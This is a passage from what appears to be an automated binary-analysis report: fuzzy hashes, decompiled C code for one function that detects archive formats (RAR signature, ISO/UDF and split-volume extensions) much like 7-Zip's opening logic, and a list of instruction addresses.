                                                                                                                                    • Opcode Fuzzy Hash: fc0d083252d6559792fd6895704e8a46f1cd35184889d66b2ac42ab283637d64
                                                                                                                                    • Instruction Fuzzy Hash: F0A28D70E042199ADF14EBA5C855BEEBBB4AF54308F1044BFE105B72C2DB785E84CB5A
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 00417BAE Relevance: 23.5, APIs: 1, Strings: 12, Instructions: 710COMMONCrypto
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 96%
                                                                                                                                    			E00417BAE(intOrPtr __ecx) {
				intOrPtr* _t349;
				signed int _t353;
				intOrPtr _t355;
				void* _t356;
				signed int _t358;
				signed int _t359;
				signed int _t364;
				signed int _t371;
				signed int _t375;
				signed int _t377;
				signed int _t378;
				signed int _t384;
				signed int _t385;
				signed int _t391;
				void* _t393;
				signed int _t396;
				void* _t402;
				char* _t407;
				signed int _t409;
				signed int _t411;
				signed int _t414;
				signed int _t426;
				intOrPtr* _t428;
				void* _t433;
				void* _t437;
				signed int _t440;
				signed int _t441;
				signed int _t449;
				intOrPtr _t457;
				signed int _t462;
				intOrPtr _t463;
				intOrPtr _t465;
				void* _t472;
				intOrPtr _t479;
				signed int _t484;
				signed int _t486;
				void* _t489;
				signed int _t495;
				signed int _t496;
				intOrPtr _t498;
				signed int _t499;
				signed int _t500;
				char* _t502;
				intOrPtr _t536;
				signed int _t555;
				signed int _t556;
				signed int _t559;
				signed int _t582;
				void* _t587;
				intOrPtr _t591;
				signed int _t594;
				intOrPtr _t607;
				signed int _t619;
				signed int _t627;
				signed int _t629;
				char* _t641;
				signed char* _t645;
				intOrPtr _t647;
				signed int _t650;
				signed int _t652;
				intOrPtr _t653;
				void* _t657;
				void* _t659;
				intOrPtr _t660;
				signed int _t663;
				signed int _t666;
				void* _t667;
				void* _t669;
				intOrPtr* _t670;

				L0046B890(E00474DC3, _t667);
				_t670 = _t669 - 0x17c;
				_t647 = __ecx;
				_t641 = 0;
				 *((intOrPtr*)(_t667 - 0x74)) = __ecx;
				_t349 =  *((intOrPtr*)(__ecx));
				if(_t349 != 0) {
					 *((intOrPtr*)( *_t349 + 8))(_t349);
					 *((intOrPtr*)(__ecx)) = 0;
				}
				 *(_t647 + 0x34) = _t641;
				 *( *(_t647 + 0x30)) = _t641;
				E00408963(_t647 + 4);
				 *(_t667 - 4) = _t641;
				 *(_t667 - 0x48) = _t641;
				 *(_t667 - 0x44) = _t641;
				 *(_t667 - 0x40) = _t641;
				E00401E9A(_t667 - 0x48, 3);
				_t353 =  *(_t667 - 0x68);
				 *(_t667 - 4) = 1;
				if(_t353 == _t641) {
					L11:
					E00404AD0(_t667 - 0x34, 4);
					 *((intOrPtr*)(_t667 - 0x34)) = 0x47a668;
					__eflags =  *(_t667 + 0xc) - _t641;
					 *(_t667 - 4) = 3;
					if( *(_t667 + 0xc) < _t641) {
						_t355 =  *((intOrPtr*)(_t667 + 8));
						_t495 = 0;
						 *(_t667 + 0xc) = _t641;
						__eflags =  *((intOrPtr*)(_t355 + 0x10)) - _t641;
						if( *((intOrPtr*)(_t355 + 0x10)) <= _t641) {
							L18:
							__eflags =  *(_t667 + 0x10) - _t641;
							if( *(_t667 + 0x10) != _t641) {
								L21:
								__eflags =  *((intOrPtr*)(_t667 - 0x2c)) - 2;
								if( *((intOrPtr*)(_t667 - 0x2c)) < 2) {
									L64:
									_t356 = E00408053( *(_t667 - 0x48), L"000");
									__eflags = _t356 - _t641;
									if(_t356 == _t641) {
										L66:
										 *(_t667 - 0x14) = _t641;
										 *(_t667 - 0x10) = _t641;
										 *((intOrPtr*)(_t667 - 0x18)) = 0x47a7ec;
										 *(_t667 - 4) = 7;
										E0040FA26(_t667 - 0x18, 0x400);
										_t358 =  *(_t667 + 0x10);
										_t496 =  *(_t667 - 0x10);
										_t359 =  *((intOrPtr*)( *_t358 + 0x10))(_t358, _t641, _t641, _t641, _t641);
										__eflags = _t359 - _t641;
										if(_t359 != _t641) {
											L68:
											_t650 = _t359;
											 *((intOrPtr*)(_t667 - 0x18)) = 0x47a7ec;
											E00407A18( *(_t667 - 0x10));
											L127:
											 *(_t667 - 4) = 1;
											E00408604(_t667 - 0x34);
											E00407A18( *(_t667 - 0x48));
											E00407A18( *((intOrPtr*)(_t667 - 0x6c)));
											_t364 = _t650;
											L33:
											 *[fs:0x0] =  *((intOrPtr*)(_t667 - 0xc));
											return _t364;
										}
										 *(_t667 + 0xc) = 0x400;
										_t359 = E0040FA74( *(_t667 + 0x10), _t496, _t667 + 0xc);
										__eflags = _t359 - _t641;
										if(_t359 == _t641) {
											__eflags =  *(_t667 + 0xc) - 0x10;
											if( *(_t667 + 0xc) < 0x10) {
												L80:
												 *(_t667 - 4) = 3;
												 *((intOrPtr*)(_t667 - 0x18)) = 0x47a7ec;
												E00407A18( *(_t667 - 0x10));
												L81:
												__eflags =  *((intOrPtr*)(_t667 - 0x2c)) - 2;
												if( *((intOrPtr*)(_t667 - 0x2c)) < 2) {
													L92:
													__eflags =  *((intOrPtr*)(_t667 - 0x2c)) - _t641;
													 *(_t667 - 0x20) = _t641;
													if( *((intOrPtr*)(_t667 - 0x2c)) <= _t641) {
														L32:
														 *(_t667 - 4) = 1;
														E00408604(_t667 - 0x34);
														E00407A18( *(_t667 - 0x48));
														E00407A18( *((intOrPtr*)(_t667 - 0x6c)));
														_t364 = 1;
														goto L33;
													}
													_t498 =  *((intOrPtr*)(_t667 - 0x74));
													__eflags = 0;
													do {
														_t652 =  *(_t667 + 0x10);
														__eflags = _t652;
														if(_t652 == 0) {
															L96:
															 *(_t667 + 0xc) = 0;
															 *(_t667 - 4) = 0xa;
															_t371 =  *( *(_t667 - 0x28) +  *(_t667 - 0x20) * 4);
															 *(_t498 + 0x1c) = _t371;
															E0040C9B4(_t667 + 0xc,  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t667 + 8)) + 0x14)) + _t371 * 4)) + 4))());
															_t375 =  *(_t667 + 0xc);
															__eflags = _t375;
															if(_t375 != 0) {
																__eflags = _t652;
																if(_t652 == 0) {
																	 *(_t667 - 0x3c) = 0;
																	 *(_t667 - 4) = 0xb;
																	 *((intOrPtr*)( *_t375))(_t375, 0x47a5b8, _t667 - 0x3c);
																	_t377 =  *(_t667 - 0x3c);
																	__eflags = _t377;
																	if(_t377 == 0) {
																		_t378 =  *(_t667 + 0xc);
																		 *(_t667 - 4) = 3;
																		__eflags = _t378;
																		if(_t378 != 0) {
																			 *((intOrPtr*)( *_t378 + 8))(_t378);
																		}
																		L111:
																		 *(_t667 - 4) = 1;
																		E00408604(_t667 - 0x34);
																		E00407A18( *(_t667 - 0x48));
																		E00407A18( *((intOrPtr*)(_t667 - 0x6c)));
																		_t364 = 0x80004001;
																		goto L33;
																	}
																	_t650 =  *((intOrPtr*)( *_t377 + 0xc))(_t377,  *((intOrPtr*)(_t667 + 0x14)));
																	_t384 =  *(_t667 - 0x3c);
																	__eflags = _t384;
																	 *(_t667 - 4) = 0xa;
																	if(_t384 != 0) {
																		 *((intOrPtr*)( *_t384 + 8))(_t384);
																	}
																	L103:
																	__eflags = _t650 - 1;
																	if(_t650 != 1) {
																		__eflags = _t650;
																		if(_t650 == 0) {
																			 *(_t667 - 0x1c) = 0;
																			 *((short*)(_t667 - 0x1a)) = 0;
																			_t385 =  *(_t667 + 0xc);
																			 *(_t667 - 4) = 0xc;
																			 *((intOrPtr*)( *_t385 + 0x20))(_t385, 0x37, _t667 - 0x1c);
																			__eflags =  *(_t667 - 0x1c);
																			if( *(_t667 - 0x1c) != 0) {
																				__eflags =  *(_t667 - 0x1c) - 8;
																				_t407 =  *(_t667 - 0x14);
																				if( *(_t667 - 0x1c) != 8) {
																					_t407 = L"Unknown error";
																				}
																				L00403593(_t498 + 0x30, _t407);
																			}
																			 *(_t667 - 4) = 0xa;
																			E0040C20F(_t667 - 0x1c);
																			E0040C9B4(_t498,  *(_t667 + 0xc));
																			_t653 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t667 + 8)) + 0x14)) +  *(_t498 + 0x1c) * 4));
																			__eflags =  *(_t653 + 0x20);
																			if( *(_t653 + 0x20) != 0) {
																				_t391 = L0041761D(_t653, _t667 - 0x48);
																				__eflags = _t391;
																				if(_t391 < 0) {
																					_t391 = 0;
																					__eflags = 0;
																				}
																				_t536 =  *((intOrPtr*)(_t653 + 0x24));
																				_t335 =  *((intOrPtr*)(_t536 + _t391 * 4)) + 0xc; // 0xc
																				_push( *((intOrPtr*)(_t536 + _t391 * 4)));
																				_t393 = E00414F74(_t667 - 0x18, _t667 - 0x6c);
																				 *(_t667 - 4) = 0x10;
																				E00401E26(_t498 + 0x10, _t393);
																				E00407A18( *((intOrPtr*)(_t667 - 0x18)));
																			} else {
																				L00403532(_t667 - 0x60, 0x490a74);
																				 *(_t667 - 4) = 0xd;
																				L00403532(_t667 - 0x18, 0x490a74);
																				_push(_t667 - 0x60);
																				_push(_t667 - 0x18);
																				 *(_t667 - 4) = 0xe;
																				_t402 = E00414F74(_t667 - 0x54, _t667 - 0x6c);
																				 *(_t667 - 4) = 0xf;
																				E00401E26(_t498 + 0x10, _t402);
																				E00407A18( *((intOrPtr*)(_t667 - 0x54)));
																				E00407A18( *((intOrPtr*)(_t667 - 0x18)));
																				E00407A18( *((intOrPtr*)(_t667 - 0x60)));
																			}
																			_t396 =  *(_t667 + 0xc);
																			 *(_t667 - 4) = 3;
																			__eflags = _t396;
																			if(_t396 != 0) {
																				 *((intOrPtr*)( *_t396 + 8))(_t396);
																			}
																			_t650 = 0;
																			__eflags = 0;
																		} else {
																			_t409 =  *(_t667 + 0xc);
																			 *(_t667 - 4) = 3;
																			__eflags = _t409;
																			if(_t409 != 0) {
																				 *((intOrPtr*)( *_t409 + 8))(_t409);
																			}
																		}
																		goto L127;
																	}
																	_t411 =  *(_t667 + 0xc);
																	 *(_t667 - 4) = 3;
																	__eflags = _t411;
																	if(_t411 != 0) {
																		 *((intOrPtr*)( *_t411 + 8))(_t411);
																	}
																	goto L106;
																}
																_t650 =  *((intOrPtr*)( *_t375 + 0xc))(_t375,  *(_t667 + 0x10), 0x47ab88,  *((intOrPtr*)(_t667 + 0x18)));
																goto L103;
															}
															 *(_t667 - 4) = 3;
															goto L106;
														}
														_t414 =  *((intOrPtr*)( *_t652 + 0x10))(_t652, 0, 0, 0, 0);
														__eflags = _t414;
														if(_t414 != 0) {
															_t650 = _t414;
															goto L127;
														}
														goto L96;
														L106:
														 *(_t667 - 0x20) =  *(_t667 - 0x20) + 1;
														__eflags =  *(_t667 - 0x20) -  *((intOrPtr*)(_t667 - 0x2c));
													} while ( *(_t667 - 0x20) <  *((intOrPtr*)(_t667 - 0x2c)));
													goto L32;
												}
												L00403532(_t667 - 0x18, L"iso");
												 *(_t667 - 4) = 8;
												 *(_t667 - 0x38) = L00417689( *((intOrPtr*)(_t667 + 8)), _t667 - 0x18);
												 *(_t667 - 4) = 3;
												E00407A18( *((intOrPtr*)(_t667 - 0x18)));
												 *_t670 = L"udf";
												L00403532(_t667 - 0x18);
												 *(_t667 - 4) = 9;
												 *(_t667 - 0x4c) = L00417689( *((intOrPtr*)(_t667 + 8)), _t667 - 0x18);
												 *(_t667 - 4) = 3;
												E00407A18( *((intOrPtr*)(_t667 - 0x18)));
												_pop(_t555);
												_t619 = 0;
												_t556 = _t555 | 0xffffffff;
												__eflags =  *((intOrPtr*)(_t667 - 0x2c)) - _t641;
												_t426 = _t556;
												if( *((intOrPtr*)(_t667 - 0x2c)) <= _t641) {
													goto L92;
												}
												 *(_t667 + 0xc) =  *(_t667 - 0x28);
												do {
													_t657 =  *( *(_t667 + 0xc));
													__eflags = _t657 -  *(_t667 - 0x38);
													if(_t657 ==  *(_t667 - 0x38)) {
														_t426 = _t619;
													}
													_t499 =  *(_t667 - 0x4c);
													__eflags = _t657 - _t499;
													if(_t657 == _t499) {
														_t556 = _t619;
													}
													 *(_t667 + 0xc) =  *(_t667 + 0xc) + 4;
													_t619 = _t619 + 1;
													__eflags = _t619 -  *((intOrPtr*)(_t667 - 0x2c));
												} while (_t619 <  *((intOrPtr*)(_t667 - 0x2c)));
												__eflags = _t556 - _t426;
												if(_t556 > _t426) {
													__eflags = _t426 - _t641;
													if(_t426 >= _t641) {
														 *( *(_t667 - 0x28) + _t556 * 4) =  *(_t667 - 0x38);
														 *( *(_t667 - 0x28) + _t426 * 4) = _t499;
													}
												}
												goto L92;
											}
											 *(_t667 - 0x4a) =  *(_t667 - 0x4a) & 0x00000000;
											_t659 = 0;
											 *((char*)(_t667 - 0x50)) = 0x52;
											 *((char*)(_t667 - 0x4f)) = 0x61;
											 *((char*)(_t667 - 0x4e)) = 0x72;
											 *((char*)(_t667 - 0x4d)) = 0x21;
											 *(_t667 - 0x4c) = 0x1a;
											 *((char*)(_t667 - 0x4b)) = 7;
											_t559 = _t496 - _t667 - 0x50;
											__eflags = _t559;
											while(1) {
												_t428 = _t667 + _t659 - 0x50;
												__eflags =  *((intOrPtr*)(_t559 + _t428)) -  *_t428;
												if( *((intOrPtr*)(_t559 + _t428)) !=  *_t428) {
													goto L80;
												}
												_t659 = _t659 + 1;
												__eflags = _t659 - 7;
												if(_t659 < 7) {
													continue;
												}
												__eflags =  *((char*)(_t496 + 9)) - 0x73;
												if( *((char*)(_t496 + 9)) != 0x73) {
													goto L80;
												}
												__eflags =  *(_t496 + 0xa) & 0x00000001;
												if(( *(_t496 + 0xa) & 0x00000001) == 0) {
													goto L80;
												}
												_t500 = 0;
												__eflags =  *((intOrPtr*)(_t667 - 0x2c)) - _t641;
												if( *((intOrPtr*)(_t667 - 0x2c)) <= _t641) {
													goto L80;
												} else {
													goto L76;
												}
												while(1) {
													L76:
													_t660 =  *((intOrPtr*)( *(_t667 - 0x28) + _t500 * 4));
													_t433 = E0040807A(L"rar");
													__eflags = _t433 - _t641;
													if(_t433 == _t641) {
														break;
													}
													_t500 = _t500 + 1;
													__eflags = _t500 -  *((intOrPtr*)(_t667 - 0x2c));
													if(_t500 <  *((intOrPtr*)(_t667 - 0x2c))) {
														continue;
													}
													goto L80;
												}
												E00408784(_t667 - 0x34, _t500, 1);
												E00408767(_t667 - 0x34, __eflags, _t641);
												 *( *(_t667 - 0x28)) = _t660;
												goto L80;
											}
											goto L80;
										}
										goto L68;
									}
									_t437 = E00408053( *(_t667 - 0x48), L"001");
									__eflags = _t437 - _t641;
									if(_t437 != _t641) {
										goto L81;
									}
									goto L66;
								}
								__eflags =  *(_t667 + 0xc) - _t641;
								if( *(_t667 + 0xc) == _t641) {
									L24:
									E00404AD0(_t667 - 0x88, 4);
									 *((intOrPtr*)(_t667 - 0x88)) = 0x47a668;
									 *(_t667 - 0x5c) = _t641;
									 *(_t667 - 0x58) = _t641;
									 *((intOrPtr*)(_t667 - 0x60)) = 0x47a7ec;
									 *(_t667 - 4) = 5;
									E0040FA26(_t667 - 0x60, 0x200000);
									_t440 =  *(_t667 + 0x10);
									_t441 =  *((intOrPtr*)( *_t440 + 0x10))(_t440, _t641, _t641, _t641, _t641);
									__eflags = _t441 - _t641;
									if(_t441 == _t641) {
										 *(_t667 + 0xc) = 0x200000;
										_t441 = E0040FA74( *(_t667 + 0x10),  *(_t667 - 0x58), _t667 + 0xc);
										__eflags = _t441 - _t641;
										if(_t441 != _t641) {
											goto L25;
										}
										__eflags =  *(_t667 + 0xc) - _t641;
										if( *(_t667 + 0xc) != _t641) {
											 *(_t667 - 0x14) = _t641;
											 *(_t667 - 0x70) =  *(_t667 - 0x58);
											 *(_t667 - 0x10) = _t641;
											 *((intOrPtr*)(_t667 - 0x18)) = 0x47a7ec;
											 *(_t667 - 4) = 6;
											E0040FA26(_t667 - 0x18, 0x10000);
											 *(_t667 - 0x20) =  *(_t667 - 0x10);
											E0046CCB0( *(_t667 - 0x10), 0xff, 0x10000);
											_t670 = _t670 + 0xc;
											__eflags =  *((intOrPtr*)(_t667 - 0x2c)) - 0x100;
											if( *((intOrPtr*)(_t667 - 0x2c)) < 0x100) {
												_t449 = 0;
												__eflags =  *((intOrPtr*)(_t667 - 0x2c)) - _t641;
												if( *((intOrPtr*)(_t667 - 0x2c)) <= _t641) {
													L38:
													_t109 = _t667 + 0xc;
													 *_t109 =  *(_t667 + 0xc) - 1;
													__eflags =  *_t109;
													_t502 = _t641;
													if( *_t109 == 0) {
														L59:
														_t663 = 0;
														__eflags =  *((intOrPtr*)(_t667 - 0x2c)) - _t641;
														if( *((intOrPtr*)(_t667 - 0x2c)) <= _t641) {
															L63:
															E0040862D();
															_push(_t667 - 0x88);
															L00443F76(_t667 - 0x34);
															 *((intOrPtr*)(_t667 - 0x18)) = 0x47a7ec;
															E00407A18( *(_t667 - 0x10));
															 *((intOrPtr*)(_t667 - 0x60)) = 0x47a7ec;
															E00407A18( *(_t667 - 0x58));
															 *(_t667 - 4) = 3;
															E00408604(_t667 - 0x88);
															goto L81;
														} else {
															goto L60;
														}
														do {
															L60:
															_t457 =  *((intOrPtr*)( *(_t667 - 0x28) + _t663 * 4));
															__eflags = _t457 - 0xff;
															if(_t457 != 0xff) {
																E00415C6D(_t667 - 0x88, _t457);
															}
															_t663 = _t663 + 1;
															__eflags = _t663 -  *((intOrPtr*)(_t667 - 0x2c));
														} while (_t663 <  *((intOrPtr*)(_t667 - 0x2c)));
														goto L63;
													}
													while(1) {
														__eflags = _t502 -  *(_t667 + 0xc);
														if(__eflags >= 0) {
															goto L46;
														}
														while(1) {
															_t627 =  *(_t667 - 0x20);
															__eflags =  *((char*)(0 + _t627)) - 0xff;
															if( *((char*)(0 + _t627)) != 0xff) {
																break;
															}
															_t502 =  &(_t502[1]);
															__eflags = _t502 -  *(_t667 + 0xc);
															if(_t502 <  *(_t667 + 0xc)) {
																continue;
															}
															break;
														}
														__eflags = _t502 -  *(_t667 + 0xc);
														L46:
														if(__eflags == 0) {
															goto L59;
														}
														_t645 = 0 +  *(_t667 - 0x20);
														__eflags = _t645;
														_t666 =  *_t645 & 0x000000ff;
														do {
															_t462 =  *( *(_t667 - 0x28) + _t666 * 4);
															 *(_t667 - 0x4c) = _t462;
															_t463 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t667 + 8)) + 0x14)) + _t462 * 4));
															_t582 =  *(_t463 + 0x30);
															__eflags = _t582;
															 *(_t667 - 0x38) = _t582;
															if(_t582 == 0) {
																L55:
																_t645 = _t667 + _t666 - 0x188;
																goto L56;
															}
															__eflags =  &(_t502[_t582]) -  *(_t667 + 0xc) + 1;
															if( &(_t502[_t582]) >  *(_t667 + 0xc) + 1) {
																goto L55;
															}
															_t465 =  *((intOrPtr*)(_t463 + 0x34));
															_t587 = 0;
															__eflags =  *(_t667 - 0x38);
															if( *(_t667 - 0x38) <= 0) {
																L54:
																E00415C6D(_t667 - 0x88,  *(_t667 - 0x4c));
																 *( *(_t667 - 0x28) + _t666 * 4) = 0xff;
																 *_t645 =  *(_t667 + _t666 - 0x188);
																goto L56;
															}
															_t629 =  &(( *(_t667 - 0x70))[_t502]);
															__eflags = _t629;
															 *(_t667 - 0x3c) = _t629;
															while(1) {
																__eflags =  *( *(_t667 - 0x3c)) -  *((intOrPtr*)(_t587 + _t465));
																if( *( *(_t667 - 0x3c)) !=  *((intOrPtr*)(_t587 + _t465))) {
																	goto L55;
																}
																_t587 = _t587 + 1;
																 *(_t667 - 0x3c) =  *(_t667 - 0x3c) + 1;
																__eflags = _t587 -  *(_t667 - 0x38);
																if(_t587 <  *(_t667 - 0x38)) {
																	continue;
																}
																goto L54;
															}
															goto L55;
															L56:
															_t666 =  *_t645 & 0x000000ff;
															__eflags = _t666 - 0xff;
														} while (_t666 != 0xff);
														_t502 =  &(_t502[1]);
														__eflags = _t502 -  *(_t667 + 0xc);
														if(_t502 <  *(_t667 + 0xc)) {
															_t641 = 0;
															__eflags = 0;
															continue;
														}
														_t641 = 0;
														__eflags = 0;
														goto L59;
													}
												} else {
													goto L35;
												}
												do {
													L35:
													_t591 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t667 + 8)) + 0x14)) +  *( *(_t667 - 0x28) + _t449 * 4) * 4));
													__eflags =  *((intOrPtr*)(_t591 + 0x30)) - 2;
													if( *((intOrPtr*)(_t591 + 0x30)) >= 2) {
														_t594 = 0 +  *(_t667 - 0x20);
														__eflags = _t594;
														 *_t594 = _t449;
														 *((char*)(_t667 + _t449 - 0x188)) =  *_t594;
													}
													_t449 = _t449 + 1;
													__eflags = _t449 -  *((intOrPtr*)(_t667 - 0x2c));
												} while (_t449 <  *((intOrPtr*)(_t667 - 0x2c)));
												goto L38;
											}
											 *((intOrPtr*)(_t667 - 0x18)) = 0x47a7ec;
											E00407A18( *(_t667 - 0x10));
											 *((intOrPtr*)(_t667 - 0x60)) = 0x47a7ec;
											E00407A18( *(_t667 - 0x58));
											 *(_t667 - 4) = 3;
											E00408604(_t667 - 0x88);
											goto L32;
										}
										_t650 = 1;
										L29:
										 *((intOrPtr*)(_t667 - 0x60)) = 0x47a7ec;
										E00407A18( *(_t667 - 0x58));
										 *(_t667 - 4) = 3;
										E00408604(_t667 - 0x88);
										goto L127;
									}
									L25:
									_t650 = _t441;
									goto L29;
								}
								_t472 = E0040807A(L"exe");
								__eflags = _t472 - _t641;
								if(_t472 != _t641) {
									goto L64;
								}
								goto L24;
							}
							__eflags =  *(_t667 + 0xc) - 1;
							if( *(_t667 + 0xc) != 1) {
								goto L111;
							}
							E00408642(_t667 - 0x34, 1);
							goto L21;
						} else {
							goto L14;
						}
						do {
							L14:
							__eflags = L0041761D( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t667 + 8)) + 0x14)) + _t495 * 4)), _t667 - 0x48);
							if(__eflags < 0) {
								E00415C6D(_t667 - 0x34, _t495);
							} else {
								 *(_t667 + 0xc) =  *(_t667 + 0xc) + 1;
								 *(_t667 - 0x38) =  *(_t667 + 0xc) << 2;
								E00408767(_t667 - 0x34, __eflags,  *(_t667 + 0xc));
								 *( *(_t667 - 0x38) +  *(_t667 - 0x28)) = _t495;
							}
							_t479 =  *((intOrPtr*)(_t667 + 8));
							_t495 = _t495 + 1;
							__eflags = _t495 -  *((intOrPtr*)(_t479 + 0x10));
						} while (_t495 <  *((intOrPtr*)(_t479 + 0x10)));
						goto L18;
					}
					E00415C6D(_t667 - 0x34,  *(_t667 + 0xc));
					goto L92;
				} else {
					_t607 =  *((intOrPtr*)(_t667 - 0x6c));
					_t484 = _t607 + _t353 * 2 - 2;
					L4:
					L4:
					if( *_t484 == 0x2e) {
						_t486 = _t484 - _t607 >> 1;
					} else {
						goto L5;
					}
					L9:
					__eflags = _t486 - _t641;
					if(_t486 >= _t641) {
						__eflags = _t486 + 1;
						_t489 = L004072C9(_t667 - 0x6c, _t667 - 0x18, _t486 + 1);
						 *(_t667 - 4) = 2;
						E00401E26(_t667 - 0x48, _t489);
						 *(_t667 - 4) = 1;
						E00407A18( *((intOrPtr*)(_t667 - 0x18)));
					}
					goto L11;
					L5:
					if(_t484 == _t607) {
						_t486 = _t484 | 0xffffffff;
						__eflags = _t486;
						goto L9;
					} else {
						_t484 = _t484;
						goto L4;
					}
				}
			}








































































                                                                                                                                    0x00417bb3
                                                                                                                                    0x00417bb8
                                                                                                                                    0x00417bc0
                                                                                                                                    0x00417bc3
                                                                                                                                    0x00417bc5
                                                                                                                                    0x00417bc8
                                                                                                                                    0x00417bcc
                                                                                                                                    0x00417bd1
                                                                                                                                    0x00417bd4
                                                                                                                                    0x00417bd4
                                                                                                                                    0x00417bd9
                                                                                                                                    0x00417be2
                                                                                                                                    0x00417be5
                                                                                                                                    0x00417bef
                                                                                                                                    0x00417bf2
                                                                                                                                    0x00417bf5
                                                                                                                                    0x00417bf8
                                                                                                                                    0x00417bfb
                                                                                                                                    0x00417c00
                                                                                                                                    0x00417c03
                                                                                                                                    0x00417c09
                                                                                                                                    0x00417c55
                                                                                                                                    0x00417c5a
                                                                                                                                    0x00417c64
                                                                                                                                    0x00417c67
                                                                                                                                    0x00417c6a
                                                                                                                                    0x00417c6e
                                                                                                                                    0x00417c80
                                                                                                                                    0x00417c83
                                                                                                                                    0x00417c85
                                                                                                                                    0x00417c88
                                                                                                                                    0x00417c8b
                                                                                                                                    0x00417cd7
                                                                                                                                    0x00417cd7
                                                                                                                                    0x00417cda
                                                                                                                                    0x00417cf0
                                                                                                                                    0x00417cf0
                                                                                                                                    0x00417cf4
                                                                                                                                    0x00417fba
                                                                                                                                    0x00417fc2
                                                                                                                                    0x00417fc7
                                                                                                                                    0x00417fc9
                                                                                                                                    0x00417fe0
                                                                                                                                    0x00417fe0
                                                                                                                                    0x00417fe3
                                                                                                                                    0x00417fe6
                                                                                                                                    0x00417ff6
                                                                                                                                    0x00417ffa
                                                                                                                                    0x00417fff
                                                                                                                                    0x00418002
                                                                                                                                    0x0041800c
                                                                                                                                    0x0041800f
                                                                                                                                    0x00418011
                                                                                                                                    0x00418028
                                                                                                                                    0x0041802b
                                                                                                                                    0x0041802d
                                                                                                                                    0x00418034
                                                                                                                                    0x004183d8
                                                                                                                                    0x004183db
                                                                                                                                    0x004183df
                                                                                                                                    0x004183e7
                                                                                                                                    0x004183ef
                                                                                                                                    0x004183f5
                                                                                                                                    0x00417e21
                                                                                                                                    0x00417e27
                                                                                                                                    0x00417e2f
                                                                                                                                    0x00417e2f
                                                                                                                                    0x0041801c
                                                                                                                                    0x0041801f
                                                                                                                                    0x00418024
                                                                                                                                    0x00418026
                                                                                                                                    0x0041803f
                                                                                                                                    0x00418043
                                                                                                                                    0x004180d3
                                                                                                                                    0x004180d6
                                                                                                                                    0x004180da
                                                                                                                                    0x004180e1
                                                                                                                                    0x004180e7
                                                                                                                                    0x004180e7
                                                                                                                                    0x004180eb
                                                                                                                                    0x00418194
                                                                                                                                    0x00418194
                                                                                                                                    0x00418197
                                                                                                                                    0x0041819a
                                                                                                                                    0x00417e00
                                                                                                                                    0x00417e03
                                                                                                                                    0x00417e07
                                                                                                                                    0x00417e0f
                                                                                                                                    0x00417e17
                                                                                                                                    0x00417e20
                                                                                                                                    0x00000000
                                                                                                                                    0x00417e20
                                                                                                                                    0x004181a0
                                                                                                                                    0x004181a3
                                                                                                                                    0x004181a5
                                                                                                                                    0x004181a5
                                                                                                                                    0x004181a8
                                                                                                                                    0x004181aa
                                                                                                                                    0x004181be
                                                                                                                                    0x004181be
                                                                                                                                    0x004181c7
                                                                                                                                    0x004181cb
                                                                                                                                    0x004181d1
                                                                                                                                    0x004181e1
                                                                                                                                    0x004181e6
                                                                                                                                    0x004181e9
                                                                                                                                    0x004181eb
                                                                                                                                    0x004181f3
                                                                                                                                    0x004181f5
                                                                                                                                    0x0041820c
                                                                                                                                    0x0041821b
                                                                                                                                    0x0041821f
                                                                                                                                    0x00418221
                                                                                                                                    0x00418224
                                                                                                                                    0x00418226
                                                                                                                                    0x00418275
                                                                                                                                    0x00418278
                                                                                                                                    0x0041827c
                                                                                                                                    0x0041827e
                                                                                                                                    0x00418283
                                                                                                                                    0x00418283
                                                                                                                                    0x00418286
                                                                                                                                    0x00418289
                                                                                                                                    0x0041828d
                                                                                                                                    0x00418295
                                                                                                                                    0x0041829d
                                                                                                                                    0x004182a3
                                                                                                                                    0x00000000
                                                                                                                                    0x004182a8
                                                                                                                                    0x00418231
                                                                                                                                    0x00418233
                                                                                                                                    0x00418236
                                                                                                                                    0x00418238
                                                                                                                                    0x0041823c
                                                                                                                                    0x00418241
                                                                                                                                    0x00418241
                                                                                                                                    0x00418244
                                                                                                                                    0x00418244
                                                                                                                                    0x00418247
                                                                                                                                    0x004182ae
                                                                                                                                    0x004182b0
                                                                                                                                    0x004182cc
                                                                                                                                    0x004182d0
                                                                                                                                    0x004182d4
                                                                                                                                    0x004182e0
                                                                                                                                    0x004182e4
                                                                                                                                    0x004182e7
                                                                                                                                    0x004182eb
                                                                                                                                    0x004182ed
                                                                                                                                    0x004182f2
                                                                                                                                    0x004182f5
                                                                                                                                    0x004182f7
                                                                                                                                    0x004182f7
                                                                                                                                    0x00418300
                                                                                                                                    0x00418300
                                                                                                                                    0x00418308
                                                                                                                                    0x0041830c
                                                                                                                                    0x00418316
                                                                                                                                    0x00418324
                                                                                                                                    0x00418327
                                                                                                                                    0x0041832a
                                                                                                                                    0x0041838e
                                                                                                                                    0x00418393
                                                                                                                                    0x00418395
                                                                                                                                    0x00418397
                                                                                                                                    0x00418397
                                                                                                                                    0x00418397
                                                                                                                                    0x00418399
                                                                                                                                    0x004183a2
                                                                                                                                    0x004183a6
                                                                                                                                    0x004183aa
                                                                                                                                    0x004183b3
                                                                                                                                    0x004183b7
                                                                                                                                    0x004183bf
                                                                                                                                    0x0041832c
                                                                                                                                    0x00418335
                                                                                                                                    0x0041833e
                                                                                                                                    0x00418342
                                                                                                                                    0x0041834d
                                                                                                                                    0x00418351
                                                                                                                                    0x00418355
                                                                                                                                    0x00418359
                                                                                                                                    0x00418362
                                                                                                                                    0x00418366
                                                                                                                                    0x0041836e
                                                                                                                                    0x00418376
                                                                                                                                    0x0041837e
                                                                                                                                    0x00418383
                                                                                                                                    0x004183c5
                                                                                                                                    0x004183c8
                                                                                                                                    0x004183cc
                                                                                                                                    0x004183ce
                                                                                                                                    0x004183d3
                                                                                                                                    0x004183d3
                                                                                                                                    0x004183d6
                                                                                                                                    0x004183d6
                                                                                                                                    0x004182b2
                                                                                                                                    0x004182b2
                                                                                                                                    0x004182b5
                                                                                                                                    0x004182b9
                                                                                                                                    0x004182bb
                                                                                                                                    0x004182c4
                                                                                                                                    0x004182c4
                                                                                                                                    0x004182bb
                                                                                                                                    0x00000000
